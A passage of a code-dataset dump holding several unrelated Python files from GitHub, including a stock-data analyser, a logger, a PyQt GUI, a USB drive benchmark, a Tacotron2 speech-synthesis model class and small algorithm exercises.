stock_constants.AVG_CLOSE_KEY: average_close,\n stock_constants.AVG_OPEN_KEY: average_open},\n sort_keys=True,\n indent=4))\n\n\ndef fetch_monthly_data(stock_data, year, month):\n \"\"\" Filters and returns a single month's data from the complete dataset passed in. \"\"\"\n pandas_dates = pd.to_datetime(stock_data['date'])\n start_date_prefix = create_first_of_month_timestamp(year, month)\n end_date_prefix = create_first_of_month_timestamp(year, month + 1)\n return stock_data[(pandas_dates < end_date_prefix) & (pandas_dates >= start_date_prefix)]\n\n\ndef create_first_of_month_timestamp(year, month):\n \"\"\" Creates a string timestamp of the first day of the month of the form:\n year-month-01\n\n Where the month is zero padded if it is a single digit month.\n\n >>> create_first_of_month_timestamp(2014, 1)\n '2014-01-01'\n >>> create_first_of_month_timestamp(1000, 12)\n '1000-12-01'\n \"\"\"\n zero_prefix = \"0\" if month < 10 else \"\"\n return \"{}-{}{}-01\".format(year, zero_prefix, month)\n\n\ndef get_max_daily_profit(stock_data):\n \"\"\" Get the most profitable day of the analysis period. \"\"\"\n if stock_data.empty:\n raise ValueError(\"Stock data cannot be empty\")\n print(\"Displaying the most profitable day:\")\n stock_data['profit'] = stock_data.apply(lambda row: row['high'] - row['low'], axis=1)\n most_profitable_day = stock_data.loc[stock_data['profit'].idxmax()]\n return most_profitable_day[['date', 'ticker', 'high', 'low', 'profit']]\n\n\ndef get_high_volume_days(stock_data):\n if stock_data.empty:\n raise ValueError(\"Stock data cannot be empty\")\n \"\"\" get the rows of the analysis period with a volume 10% above the average volume. \"\"\"\n print(\"Displaying days which had volumes exceeding 10% of the average volume for the period:\")\n avg_volume = stock_data['volume'].mean()\n high_volume_mark = (1 + stock_constants.HIGH_VOLUME_THRESHOLD) * avg_volume\n high_days = stock_data[stock_data['volume'] > high_volume_mark]\n print(\"Avg volume: \" + str(avg_volume))\n print(\"High volume days:\")\n return high_days[['ticker', 'date', 'volume']]\n\n\ndef get_bad_days(stock_data):\n if (stock_data.empty):\n raise ValueError(\"Stock data cannot be empty\")\n \"\"\" Return the number of days in the analysis period which had a closing price lower than the opening price. \"\"\"\n print(\"Displaying Number of 'Losing' days\")\n bad_days = stock_data[stock_data['close'] < stock_data['open']]\n return bad_days.shape[0]\n\n\ndef get_stock_data(stock, start_date, end_date):\n \"\"\" Make a request to quandl to fetch stock data for a single stock for a period of time \"\"\"\n return quandl.get_table(\n stock_constants.TABLE_NAME,\n ticker=stock,\n date={'gte': stock_constants.START_DATE, 'lte': stock_constants.END_DATE})\n\n\ndef create_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--stocks\",\n default='COF,GOOGL,MSFT',\n help=\"A comma separated list of ticker symbols to run the analysis on. \" +\n \"Default is `COF,GOOGL,MSFT`.\")\n parser.add_argument(\"--max-daily-profit\",\n help=\"Adds output which specifies the day in the analysis which would have \" +\n \"provided the highest gain for each security.\",\n action=\"store_true\")\n parser.add_argument(\"--busy-day\",\n help=\"Adds output which specifies the day in the analysis during which volume \" +\n \"was 10 percent higher than average for each security.\",\n action=\"store_true\")\n parser.add_argument(\"--biggest-loser\",\n help=\"Adds output which specifies the security which had the most days where \" +\n \"the closing price was lower than the opening price.\",\n action=\"store_true\")\n return parser\n\n\ndef main():\n parser = create_parser()\n args = parser.parse_args()\n for ticker in args.stocks.split(','):\n fetch_stock_data(ticker, args.max_daily_profit, args.busy_day, args.biggest_loser)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"maxwolffe/QuandlTest","sub_path":"stock_data.py","file_name":"stock_data.py","file_ext":"py","file_size_in_byte":5745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26719788706","text":"\nimport os\nimport sys\nimport logging\nimport tempfile\nimport time\nfrom logging import FileHandler\n\nformatters = [logging.Formatter(\"%(asctime)s :: %(threadName)s :: %(module)s :: %(funcName)s :\\n\"\n \" %(levelname)s :: %(msg)s\"), # WARNING, INFO\n logging.Formatter(\"%(asctime)s :: %(module)s :: %(funcName)s :\\n %(levelname)s :: %(msg)s\"),\n logging.Formatter(\"%(module)s :: %(funcName)s :: %(levelname)s :: %(msg)s\"), # DEBUG\n logging.Formatter(\"%(asctime)s :: %(levelname)s :: %(msg)s\"),\n logging.Formatter(\"%(levelname)s :: %(msg)s\")] # Console\n\n\nclass PersonalizedLogger(logging.Logger):\n\n CRITICAL = logging.CRITICAL # 50\n FATAL = logging.FATAL # 50\n ERROR = logging.ERROR # 40\n WARNING = logging.WARNING # 30\n WARN = logging.WARN # 30\n INFO = logging.INFO # 20\n DEBUG = logging.DEBUG # 10\n FINE = 5\n NOTSET = logging.NOTSET # 0\n\n def __init__(self):\n logging.Logger.__init__(self, \"LOGGER\", level=logging.NOTSET)\n\n # File Handler\n # Will create the file activity.log in the directory /logs\n # from the directory where the application have been launched\n basename = os.path.splitext(os.path.basename(sys.argv[0]))[0]\n # self.logs_directory = os.path.abspath(\"logs\") + os.path.sep + basename + os.path.sep\n self.logs_directory = tempfile.gettempdir() + \"/logs\" + os.path.sep + basename + os.path.sep\n os.makedirs(self.logs_directory, exist_ok=True)\n self.open_file_handlers = {}\n for level in (logging.WARNING, logging.INFO):\n self.add_filehandler(level)\n\n # Console Handler\n self.cons_handler = logging.StreamHandler()\n self.cons_handler.setFormatter(formatters[-1])\n self.cons_handler.setLevel(logging.INFO)\n self.addHandler(self.cons_handler)\n\n # Done\n self.debug(\"File and Console logging successfully initialised\")\n\n def add_filehandler(self, level):\n \"\"\"\n Add to self.handlers a new FileHandler\n His level is set with the argument 'level'\n :param level: a logging existing level\n :return: None\n \"\"\"\n assert isinstance(level, int), \"level must be an integer\"\n\n level_name = logging.getLevelName(level)\n filename = self.logs_directory + level_name + \".log\"\n file = open(filename, 'w')\n file.write(\"\\n-------------------------------------------------------------\")\n file.write(\"\\n LOG FILE\")\n file.write(\"\\n {}\".format(time.strftime(\"%b %d, %Y at %H:%M and %S seconds\", time.localtime())))\n file.write(\"\\n File log level:{}\".format(level_name))\n file.write(\"\\n Executing script:{}\".format(sys.argv[0]))\n file.write(\"\\n-------------------------------------------------------------\\n\\n\")\n file.close()\n file_handler = FileHandler(filename)\n file_handler.setLevel(level)\n if level != logging.DEBUG:\n file_handler.setFormatter(formatters[0])\n if level == logging.DEBUG:\n file_handler.setFormatter(formatters[2])\n self.addHandler(file_handler)\n self.open_file_handlers[level] = (1, file_handler)\n\n def add_debug_filehandler(self):\n if logging.DEBUG not in self.open_file_handlers:\n self.add_filehandler(logging.DEBUG)\n\n def fine(self, msg, *args, **kwargs):\n \"\"\"\n Log 'msg % args' with severity 'FINE'.\n\n To pass exception information, use the keyword argument exc_info with\n a true value, e.g.\n\n logger.fine(\"Houston, we have a %s\", \"interesting problem\", exc_info=1)\n \"\"\"\n if self.isEnabledFor(self.FINE):\n self._log(self.FINE, msg, args, **kwargs)\n\n\nLOGGER = PersonalizedLogger()\n# logging.addLevelName(LOGGER.FINE, \"FINE\")\n","repo_name":"ChreSyr/baopig","sub_path":"baopig/io/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"21721171458","text":"# Script to send a trigger signal\n\nimport machine\nimport time\n\n# Set up GPIO pins\npin = machine.Pin(17, machine.Pin.OUT)\n\n# Send trigger signal\nwhile True:\n pin.on()\n print(\"on\")\n time.sleep(0.3)\n pin.off()\n print(\"off\")\n time.sleep(0.3)\n","repo_name":"Duesentrieb71/IRS_CanSat","sub_path":"Old_tests/simple_tx.py","file_name":"simple_tx.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"14882301064","text":"# Desarrolle un programa que permita desplegar una GUI que permita ingresar una palabra y\n# al presionar un boton, se muestre la palabra al rev ́es.\nimport sys\nfrom PyQt6.QtCore import QSize, Qt\nfrom PyQt6.QtWidgets import QApplication, QMainWindow, QVBoxLayout, QLabel, QPushButton, QWidget, QLineEdit\n\nclass Ventana(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(f\"GUI 2\")\n self.setFixedSize(QSize(200,200))\n #Elementos\n instruccion = QLabel(f\"Ingresa una palabra,\\nluego presiona el boton\\npara invertirla.\")\n instruccion.setAlignment(Qt.AlignmentFlag.AlignCenter)\n self.caja_de_texto = QLineEdit()\n self.palabra = QLabel(\"\")\n self.palabra.setAlignment(Qt.AlignmentFlag.AlignCenter)\n boton = QPushButton(\"Invertir\")\n boton.clicked.connect(lambda: self.reves(self.caja_de_texto.text()))\n #layout\n layout = QVBoxLayout()\n #elementos al layout\n layout.addWidget(instruccion)\n layout.addWidget(self.caja_de_texto)\n layout.addWidget(self.palabra)\n layout.addWidget(boton)\n #insertar layout\n contenedor = QWidget()\n contenedor.setLayout(layout)\n self.setCentralWidget(contenedor)\n\n def reves(self, palabra):\n aux = \"\"\n palabra = list(palabra)\n palabra.reverse()\n for i in range(len(palabra)):\n aux += palabra[i]\n self.caja_de_texto.setText(\"\")\n self.palabra.setText(aux)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ventana = Ventana()\n ventana.show()\n\n app.exec()","repo_name":"vicenteJavierveloso/GUI","sub_path":"GUI2.py","file_name":"GUI2.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"41886361151","text":"import logging\nimport threading\nimport time\nimport concurrent.futures\n\n\ndef fib(n):\n if n <= 1 :\n return n\n else:\n return fib(n-1) + fib(n-2)\n\nclass FakeDatabase:\n def __init__(self):\n self.value = 0\n\n def update(self, name):\n logging.info(\"Thread %s: starting update\", name)\n local_copy = self.value\n local_copy += 1\n logging.info(\"Thread %s: Before sleeping\", name)\n \n # Probably context switching goes here \n # fib(30) # could use time.sleep here as well\n self.value = local_copy\n logging.info(\"Thread %s: finishing update\", name)\n\n\nif __name__ == \"__main__\":\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n database = FakeDatabase()\n logging.info(\"Testing update. Starting value is %d.\", database.value)\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n for index in range(2):\n executor.submit(database.update, index)\n logging.info(\"Testing update. Ending value is %d.\", database.value)\n","repo_name":"robinnarsinghranabhat/Python_Concurrency_Projects","sub_path":"concurrency_snippets/threading_concepts/multiple_threads_without_lock.py","file_name":"multiple_threads_without_lock.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"70975703674","text":"import os\nimport time\nimport subprocess\nimport random\nimport math\nimport traceback\n\ndef getDevices():\n RawDevices = subprocess.check_output(\n \"wmic logicaldisk where drivetype=2 get deviceid, volumename, description, volumeserialnumber, Size, Filesystem, freespace /format:list\",\n shell=True)\n\n RawDevices += subprocess.check_output(\n \"wmic logicaldisk where drivetype=3 get deviceid, volumename, description, volumeserialnumber, Size, Filesystem, freespace /format:list\",\n shell=True)\n Devices = RawDevices.decode().split(\"\\n\")\n X = [elem.strip().split(\"=\") for elem in Devices]\n Final = [x for x in X if x != ['']]\n myDict = {}\n for sub_list in Final:\n key, value = sub_list[0], sub_list[1]\n if key in myDict:\n myDict[key].append(value)\n else:\n myDict[key] = [value]\n\n if 'C:' in myDict['DeviceID']:\n temp = myDict['DeviceID'].index('C:')\n for key in myDict:\n del myDict[key][int(temp)]\n\n return (myDict)\n\n\ndef writeFile(letterDrive, fileSize, blockSize): # inputs: str letterDrive to access. Size of write\n numWrites = (fileSize * 1024) / blockSize\n data = bytearray(1024 * blockSize) # create the array for the data. Must be strictly sized\n for byte in range(len(data)):\n data[byte] = random.randint(0x0, 0xff) # allocate the data to the same values. hex aa is alternating bits\n with open('%s:\\output_file' % letterDrive, 'bw+') as fout:\n fout.seek(0)\n start = time.clock()\n for i in range(int(numWrites)):\n fout.write(data) # write to file\n os.fsync(fout)\n end = time.clock()\n fout.truncate()\n fout.flush()\n os.fsync(fout)\n fout.close()\n\n del data\n timeTaken = end - start\n return (timeTaken) # return time taken\n\n\ndef readFile(fileLocation, blockSize,i): # inputs: str full fileLocation to access. Size of read\n fileSize = os.stat(fileLocation).st_size\n numReads = fileSize / (blockSize * 1024)\n filename = 'output_file_test' + str(i)\n #mW.addText(numReads)\n print(numReads)\n try:\n start = time.clock()\n with open(fileLocation, \"rb\",1024 * blockSize) as fin: # open the file\n with open(filename, \"wb+\", 1024 * blockSize) as fout:\n for i in range(math.ceil(numReads)):\n #fout.write(fin.read(1024 * blockSize)) # read in up to the blockSize in kB\n data = fin.read(1024 * blockSize)\n fin.flush()\n #os.fsync(fin)\n #print(data)\n fin.flush()\n fout.write(data)\n fout.flush()\n os.fsync(fout.fileno())\n end = time.clock()\n fin.close()\n #print(data)\n timeTaken = end - start\n except Exception as e:\n print(str(e))\n traceback.print_exc()\n\n try:\n print(\"written\")\n os.remove(filename)\n except:\n print(\"file not found\")\n print(timeTaken)\n return (timeTaken) # return time taken\n\n\ndef benchmarkDevice(mainWindow, app, letterDrive, smallBlockSize, bigBlockSize, fileSize, write=True, read=True):\n # Write section\n writeflag = True\n writeTimes = []\n readTimes = []\n blockSizes = []\n mW = mainWindow\n for i in range(smallBlockSize, bigBlockSize + 1):\n if write:\n if read:\n tempString = \"Writing at \" + str(2 ** i) + \" kB blockSize \" + \"(Test \" + str(\n (i - smallBlockSize + 1) * 2 - 1) + \" of \" + str((bigBlockSize - smallBlockSize + 1) * 2) + \")\"\n else:\n tempString = \"Writing at \" + str(2 ** i) + \" kB blockSize \" + \"(Test \" + str(\n i - smallBlockSize + 1) + \" of \" + str((bigBlockSize - smallBlockSize + 1)) + \")\"\n mainWindow.addText(tempString)\n app.processEvents()\n writeTimes.append(fileSize / (writeFile(letterDrive, fileSize, 2 ** i)))\n writeflag = False\n # os.remove('%s:\\output_file' % letterDrive)\n elif writeflag:\n mainWindow.addText(\"Writing a Temporary File for Reading Tests\")\n app.processEvents()\n writeFile(letterDrive, fileSize, 2 ** 8)\n writeflag = False\n if read:\n if write:\n tempString = \"Reading at \" + str(2 ** i) + \" kB blockSize \" + \"(Test \" + str(\n (i - smallBlockSize + 1) * 2) + \" of \" + str((bigBlockSize - smallBlockSize + 1) * 2) + \")\"\n else:\n tempString = \"Reading at \" + str(2 ** i) + \" kB blockSize \" + \"(Test \" + str(\n (i - smallBlockSize + 1)) + \" of \" + str((bigBlockSize - smallBlockSize + 1)) + \")\"\n mainWindow.addText(tempString)\n app.processEvents()\n readTimes.append(fileSize / (readFile('%s:\\output_file' % letterDrive, 2 ** i, i)))#'%s:Iron Man 2008.720p.BrRip.x264.YIFY.mp4'\n blockSizes.append(2 ** i)\n os.remove('%s:\\output_file' % letterDrive)\n\n # if(read and write):\n # return(blockSizes,writeTimes,readTimes)\n # elif(read):\n # return(blockSizes,readTimes)\n # elif(write):\n # return(blockSizes,writeTimes)\n # else:\n # return(blockSizes)\n return (blockSizes, writeTimes, readTimes)\n\n\nif __name__ == \"__main__\":\n print(benchmarkDevice(\"D\", 0, 16, 100))\n","repo_name":"MilesWT/USB-Benchmark","sub_path":"wmicAPI.py","file_name":"wmicAPI.py","file_ext":"py","file_size_in_byte":5443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"37639262671","text":"import os\r\nimport numpy as np\r\nimport pandas as pd\r\nimport tensorflow as tf\r\n\r\nfrom models.tts.tacotron2 import Tacotron2\r\nfrom models.siamese.audio_siamese import AudioSiamese\r\nfrom models.weights_converter import partial_transfer_learning\r\nfrom utils import load_embedding, save_embeddings, select_embedding, sample_df\r\n\r\n_default_embeddings_filename = 'default_embeddings'\r\n\r\nclass SV2TTSTacotron2(Tacotron2):\r\n def __init__(self,\r\n lang,\r\n speaker_encoder_name,\r\n speaker_embedding_dim, \r\n use_utterance_embedding = False,\r\n \r\n **kwargs\r\n ):\r\n self.__embeddings = None\r\n self.__speaker_encoder = None\r\n\r\n self.speaker_embedding_dim = speaker_embedding_dim\r\n self.use_utterance_embedding = use_utterance_embedding\r\n self.speaker_encoder_name = speaker_encoder_name\r\n \r\n super().__init__(lang = lang, **kwargs)\r\n \r\n def _init_folders(self):\r\n super()._init_folders()\r\n os.makedirs(self.embedding_dir, exist_ok=True)\r\n \r\n def init_train_config(self,\r\n augment_speaker_embedding = False,\r\n use_utterance_embedding = False,\r\n ** kwargs\r\n ):\r\n self.augment_speaker_embedding = augment_speaker_embedding\r\n self.use_utterance_embedding = use_utterance_embedding\r\n \r\n super().init_train_config(** kwargs)\r\n \r\n def _build_model(self, **kwargs):\r\n super()._build_model(\r\n encoder_speaker_embedding_dim = self.speaker_embedding_dim,\r\n ** kwargs\r\n )\r\n \r\n @property\r\n def embedding_dir(self):\r\n return os.path.join(self.folder, 'embeddings')\r\n \r\n @property\r\n def has_default_embedding(self):\r\n return len(os.listdir(self.embedding_dir)) > 0\r\n \r\n @property\r\n def default_embedding_file(self):\r\n return os.path.join(self.embedding_dir, _default_embeddings_filename)\r\n \r\n @property\r\n def input_signature(self):\r\n return (\r\n tf.TensorSpec(shape = (None, None), dtype = tf.int32),\r\n tf.TensorSpec(shape = (None,), dtype = tf.int32),\r\n tf.TensorSpec(shape = (None, self.speaker_embedding_dim), dtype = tf.float32),\r\n tf.TensorSpec(shape = (None, None, self.n_mel_channels), dtype = tf.float32),\r\n tf.TensorSpec(shape = (None,), dtype = tf.int32),\r\n )\r\n \r\n @property\r\n def training_hparams(self):\r\n return super().training_hparams(\r\n augment_speaker_embedding = False,\r\n use_utterance_embedding = False\r\n )\r\n \r\n @property\r\n def embedding_dim(self):\r\n return self.speaker_embedding_dim\r\n \r\n @property\r\n def embeddings(self):\r\n return self.__embeddings\r\n \r\n @property\r\n def speaker_encoder(self):\r\n if self.__speaker_encoder is None:\r\n self.__speaker_encoder = AudioSiamese(nom = self.speaker_encoder_name)\r\n self.__speaker_encoder.get_model().trainable = False\r\n return self.__speaker_encoder\r\n \r\n def __str__(self):\r\n des = super().__str__()\r\n des += \"Speaker embedding dim : {}\\n\".format(self.speaker_embedding_dim)\r\n if self.speaker_encoder_name is not None:\r\n des += \"Speaker encoder : {}\\n\".format(self.speaker_encoder_name)\r\n return des\r\n \r\n def compile(self, loss_config = {}, ** kwargs):\r\n if 'mel_loss' in loss_config and 'similarity' in loss_config['mel_loss']:\r\n self.speaker_encoder\r\n loss_config.setdefault('similarity_function', self.pred_similarity)\r\n \r\n super().compile(loss_config = loss_config, ** kwargs)\r\n \r\n def pred_similarity(self, y_true, y_pred):\r\n score = self.speaker_encoder([y_true, y_pred])\r\n return score if not self.speaker_encoder.embed_distance else 1. - score\r\n \r\n def load_speaker_encoder(self, name = None):\r\n if self.__speaker_encoder is not None:\r\n if name is None or self.__speaker_encoder.nom == name:\r\n return\r\n \r\n if name is None and self.speaker_encoder_name is None:\r\n raise ValueError(\"You must provide the name for the speaker encoder !\")\r\n \r\n if self.speaker_encoder_name is None:\r\n self.speaker_encoder_name = name\r\n else:\r\n name = self.speaker_encoder_name\r\n \r\n self.__speaker_encoder = AudioSiamese(nom = name)\r\n \r\n def set_default_embeddings(self, embeddings, filename = None):\r\n self.add_embeddings(embeddings, _default_embeddings_filename)\r\n \r\n def add_embeddings(self, embeddings, name):\r\n save_embeddings(self.embedding_dir, embeddings, embedding_name = name)\r\n \r\n def set_embeddings(self, embeddings):\r\n self.__embeddings = embeddings\r\n if not self.has_default_embedding:\r\n self.set_default_embeddings(embeddings)\r\n \r\n def load_embeddings(self, directory = None, filename = None, ** kwargs):\r\n if not self.has_default_embedding and directory is None:\r\n raise ValueError(\"No default embeddings available !\\n Use the 'set_default_embeddings()' or 'set_embeddings()' method\")\r\n \r\n if directory is None:\r\n directory = self.embedding_dir\r\n if len(os.listdir(self.embedding_dir)) == 1:\r\n filename = os.listdir(self.embedding_dir)[0]\r\n if filename is None:\r\n filename = _default_embeddings_filename\r\n \r\n embeddings = load_embedding(\r\n directory,\r\n embedding_dim = self.embedding_dim, \r\n embedding_name = filename,\r\n ** kwargs\r\n )\r\n \r\n self.set_embeddings(embeddings)\r\n \r\n def infer(self, text, text_length, spk_embedding, * args, ** kwargs):\r\n if tf.rank(spk_embedding) == 1:\r\n spk_embedding = tf.expand_dims(spk_embedding, axis = 0)\r\n if not isinstance(text, str) and tf.shape(spk_embedding)[0] < tf.shape(text)[0]:\r\n spk_embedding = tf.tile(spk_embedding, [tf.shape(text)[0], 1])\r\n \r\n return super().infer([text, spk_embedding], text_length, * args, ** kwargs)\r\n \r\n def embed(self, audios, ** kwargs):\r\n self.load_speaker_encoder()\r\n return self.__speaker_encoder.embed(audios, ** kwargs)\r\n \r\n def get_speaker_embedding(self, data):\r\n \"\"\" This function is used in `encode_data` and must return a single embedding \"\"\"\r\n def load_np(filename):\r\n return np.load(filename.numpy().decode('utf-8'))\r\n \r\n embedding = data\r\n if isinstance(data, (dict, pd.Series)):\r\n embedding_key = 'speaker_embedding'\r\n if self.use_utterance_embedding and 'embedding' in data:\r\n embedding_key = 'embedding'\r\n embedding = data[embedding_key]\r\n \r\n if isinstance(embedding, tf.Tensor) and embedding.dtype == tf.string:\r\n embedding = tf.py_function(load_np, [embedding], Tout = tf.float32)\r\n embedding.set_shape([self.speaker_embedding_dim])\r\n elif isinstance(embedding, str):\r\n embedding = np.load(embedding)\r\n \r\n return embedding\r\n \r\n def encode_data(self, data):\r\n text, text_length, mel_input, mel_length, mel_output, gate = super().encode_data(data)\r\n \r\n embedded_speaker = self.get_speaker_embedding(data)\r\n \r\n return text, text_length, embedded_speaker, mel_input, mel_length, mel_output, gate\r\n \r\n def filter_data(self, text, text_length, embedded_speaker, mel_input, \r\n mel_length, mel_output, gate):\r\n return super().filter_data(\r\n text, text_length, mel_input, mel_length, mel_output, gate\r\n )\r\n \r\n def augment_embedding(self, embedding):\r\n return tf.cond(\r\n tf.random.uniform(()) < self.augment_prct,\r\n lambda: embedding + tf.random.normal(tf.shape(embedding), stddev = 0.025),\r\n lambda: embedding\r\n )\r\n \r\n def augment_data(self, text, text_length, embedded_speaker, mel_input, \r\n mel_length, mel_output, gate):\r\n mel_input = self.augment_mel(mel_input)\r\n if self.augment_speaker_embedding:\r\n embedded_speaker = self.augment_embedding(embedded_speaker)\r\n \r\n return text, text_length, embedded_speaker, mel_input, mel_length, mel_output, gate\r\n \r\n def preprocess_data(self, text, text_length, embedded_speaker, mel_input, \r\n mel_length, mel_output, gate):\r\n (text, text_length, mel_input, mel_length), target = super().preprocess_data(\r\n text, text_length, mel_input, mel_length, mel_output, gate\r\n )\r\n \r\n return (text, text_length, embedded_speaker, mel_input, mel_length), target\r\n \r\n def get_dataset_config(self, **kwargs):\r\n config = super().get_dataset_config(**kwargs)\r\n config['pad_kwargs'] = {\r\n 'padded_shapes' : (\r\n (None,), (), (self.speaker_embedding_dim,), (None, self.n_mel_channels), (),\r\n (None, self.n_mel_channels), (None,)\r\n ),\r\n 'padding_values' : (self.blank_token_idx, 0, 0., 0., 0, 0., 1.)\r\n }\r\n \r\n return config\r\n \r\n def train(self, x, * args, ** kwargs):\r\n if isinstance(x, pd.DataFrame) and not self.has_default_embedding:\r\n self.set_default_embeddings(sample_df(x, n = 50, n_sample = 10))\r\n \r\n return super().train(x, * args, ** kwargs)\r\n \r\n def embed_and_predict(self,\r\n audios,\r\n sentences, \r\n ** kwargs\r\n ):\r\n embeddings = self.embed(audios)\r\n \r\n return self.predict(sentences, embeddings = embeddings, ** kwargs)\r\n \r\n def predict(self,\r\n * args,\r\n embeddings = None,\r\n embedding_mode = {},\r\n overwrite = True,\r\n ** kwargs\r\n ):\r\n \"\"\"\r\n Perform Tacotron-2 inference on all phrases\r\n Arguments :\r\n - args / kwargs : args passed to super().predict()\r\n - embeddings : the embeddings to use as input (only 1 is selected from this set and effectively used)\r\n - embedding_mode : kwargs passed to `select_embedding()`\r\n Return : result of super().predict()\r\n \r\n Note : currently we just save the resulting audio for a given sentence but not the speaker / embedding used to generate it. \r\n So it can be more interesting to put `overwrite = True` for this model as it is basically used to generate audio with multiple voices (it is the reason why this argument is overriden to `True` in this function)\r\n \"\"\"\r\n # load embeddings if needed\r\n if embeddings is not None:\r\n self.set_embeddings(embeddings)\r\n elif self.embeddings is None:\r\n self.load_embeddings()\r\n \r\n if not self.use_utterance_embedding:\r\n embedding_mode.setdefault('mode', 'mean')\r\n \r\n selected_embedding = select_embedding(self.embeddings, ** embedding_mode)\r\n selected_embedding = tf.expand_dims(\r\n tf.cast(selected_embedding, tf.float32), axis = 0\r\n )\r\n \r\n return super().predict(\r\n * args, spk_embedding = selected_embedding, overwrite = overwrite, ** kwargs\r\n )\r\n \r\n def get_config(self, *args, **kwargs):\r\n config = super().get_config(*args, **kwargs)\r\n config['speaker_embedding_dim'] = self.speaker_embedding_dim\r\n config['use_utterance_embedding'] = self.use_utterance_embedding\r\n config['speaker_encoder_name'] = self.speaker_encoder_name\r\n \r\n return config\r\n \r\n @classmethod\r\n def build_from_sv2tts_pretrained(cls, \r\n nom,\r\n pretrained_name = 'sv2tts_tacotron2',\r\n ** kwargs\r\n ):\r\n with tf.device('cpu') as device: \r\n pretrained_model = SV2TTSTacotron2(nom = pretrained_name)\r\n \r\n kwargs.setdefault('lang', pretrained_model.lang)\r\n kwargs.setdefault('text_encoder', pretrained_model.text_encoder)\r\n kwargs.setdefault('speaker_encoder_name', pretrained_model.speaker_encoder_name)\r\n kwargs.setdefault('speaker_embedding_dim', pretrained_model.speaker_embedding_dim)\r\n \r\n instance = cls(nom = nom, max_to_keep = 1, pretrained_name = pretrained_name, ** kwargs)\r\n\r\n partial_transfer_learning(instance.tts_model, pretrained_model.tts_model)\r\n \r\n instance.save()\r\n \r\n return instance\r\n \r\n","repo_name":"Ca-ressemble-a-du-fake/text_to_speech","sub_path":"models/tts/sv2tts_tacotron2.py","file_name":"sv2tts_tacotron2.py","file_ext":"py","file_size_in_byte":13155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"95"} +{"seq_id":"4706216754","text":"def solution(num, total):\n answer = list()\n if num == 1:\n return [total]\n n = (total + 1) // num - ((num + 1) // 2 - 1)\n for _ in range(num):\n answer.append(n)\n n += 1\n return answer\n\n","repo_name":"Daeho-Son/PS","sub_path":"Programmers/Lv_0/연속된_수의_합/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"12955195959","text":"from __future__ import absolute_import, unicode_literals\n\ntry:\n from functools import lru_cache\nexcept ImportError:\n from functools32.functools32 import lru_cache\n\nfrom copy import deepcopy\nfrom numpy import matrix, linspace, meshgrid, sin, cos, pi, sqrt, multiply, \\\n random as nprandom\n\n\n@lru_cache(maxsize=100)\ndef _points_in_surface_sphere(num_of_points):\n \"\"\"Return a point in the surface of the sphere.\n\n :param num_of_points: how many point to describe the surface\n :return: points\n \"\"\"\n row = int(sqrt(num_of_points))\n if num_of_points % (row**2) > 0:\n row = row + 1\n [phi, theta] = meshgrid(linspace(0, 2 * pi, row), linspace(0, pi, row))\n phi = matrix(phi)\n theta = matrix(theta)\n x = multiply(sin(theta), cos(phi))\n y = multiply(sin(theta), sin(phi))\n z = cos(theta)\n\n return list(map(lambda x, y, z: matrix([x, y, z]), x.A1, y.A1, z.A1))\n\n\ndef generate_points_in_surface_sphere(center, radius, num_of_points):\n \"\"\"Generate a point on sphere surface defined by center and radius.\n\n :param center: sphere center\n :param radius: sphere radius\n :param num_of_points: how many points to describe the surface\n :return: point as matrix\n \"\"\"\n points = iter(_points_in_surface_sphere(num_of_points))\n while True:\n yield radius * next(points) + center\n\n\ndef generate_points_random_in_surface_sphere(center, radius, random=None):\n \"\"\"Generate random points on sphere surface defined by center and radius.\n\n e.g. generate randomly point around center [10, 10, 10] distant 4 from it.\n\n .. code-block:: python\n\n from numpy import matrix\n center = matrix([10, 10, 10])\n radius = 4\n generator = generate_points_random_in_surface_sphere(center, radius)\n point = next(generator)\n\n :param center: sphere center\n :param radius: shere radius\n :param random: random number generator\n :return: point as matrix\n \"\"\"\n while True:\n random = random or nprandom\n phi = 2 * pi * random.random()\n theta = pi * random.random()\n x = radius * sin(theta) * cos(phi)\n y = radius * sin(theta) * sin(phi)\n z = radius * cos(theta)\n yield matrix([x, y, z]) + center\n\n\ndef generate_sequential_points(start_point, random=None):\n \"\"\"Generate sequential points.\n\n :param start_point: point where to start\n :param random: random generator\n :return: next point\n \"\"\"\n point = deepcopy(start_point)\n random = random or nprandom\n while True:\n point = point + random.random() - matrix([0.5, 0.5, 0.5])\n yield point\n\n\ndef distance(point_1, point_2):\n \"\"\"Compute the euclidean distance from the two points.\"\"\"\n return sqrt(sum((point_1-point_2).A[0]**2))\n","repo_name":"hachreak/pylocating","sub_path":"src/pylocating/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"10626705005","text":"from graphs import Graph\n\ndef bfs(graph, source):\n if source not in graph.vertices():\n raise Error(\"bfs: source is not in graph\")\n parent = {source: None}\n levels = {source: 0}\n current_level = 1\n frontier = [source]\n \n while frontier:\n next_frontier = []\n for u in frontier:\n for v in graph.adj_list(u):\n if v not in parent:\n parent[v] = u\n levels[v] = current_level\n next_frontier.append(v)\n current_level += 1\n frontier = next_frontier\n return (parent, levels)\n\nif __name__ == '__main__':\n g = Graph()\n for key in [1, 2, 3, 